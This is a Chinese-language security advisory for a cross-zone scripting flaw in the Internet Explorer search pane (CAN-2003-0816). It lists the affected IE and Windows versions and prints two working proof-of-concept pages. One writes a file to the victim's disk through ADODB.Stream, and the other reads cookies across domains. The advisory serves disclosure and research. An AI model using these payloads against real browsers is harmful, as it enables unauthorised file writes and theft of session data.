Microsoft Internet Explorer window.open搜索格跨域脚本漏洞
受影响系统:
Microsoft Internet Explorer 6.0SP1
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.0.1SP3
Microsoft Internet Explorer 5.0.1SP2
Microsoft Internet Explorer 5.0.1SP1
Microsoft Internet Explorer 5.0
Microsoft Internet Explorer 6.0
- Microsoft Windows XP Professional
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 9798
CVE(CAN) ID: CAN-2003-0816
Microsoft Internet Explorer是一款流行的WEB浏览器。
Microsoft Internet Explorer在处理搜索栏(Search panes)时对输入缺少充分过滤,远程攻击者可以利用这个漏洞构建恶意链接,诱使用户访问,可获得敏感信息。
问题是当搜索栏通过'window.open'方法打开时搜索地址属性缺少充分过滤,当目标用户打开此链接时,包含的恶意脚本就会在用户浏览器上,以我的电脑域权限或其他域执行,可导致敏感信息泄露。
<*来源:Cheng Peng Su (apple_soup@msn.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=107833057714330&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Cheng Peng Su (apple_soup@msn.com)提供了如下测试方法:
---------------------------CrossZone.htm---------------------------
<script>
window.open("http://wrong_site_add/","_search") //To load "Friendly HTTP error messages" page
// cause it's in My Computer Zone.
setTimeout(function(){
// '\\42' -> '\42' -> ' " '
img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);'
+ ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);'
+ ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';
inject_html="<img src='" + img_src + "'>";
window.open('file:javascript:document.write("' + inject_html + '")','_search');
},5000);
</script>
-------------------------------End---------------------------------
---------------------------CrossSite.htm---------------------------
<script>
window.open("http://www.google.com/","_search")
setTimeout(function(){
window.open("file:javascript:alert(document.cookie);","_search")
},5000);
</script>
-------------------------------End---------------------------------
演示页面可参考如下:
http://www.freewebs.com/applesoup/CrossBar/CrossSiteSB.htm
http://www.freewebs.com/applesoup/CrossBar/CrossZoneSB.htm
建议:
--------------------------------------------------------------------------------
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp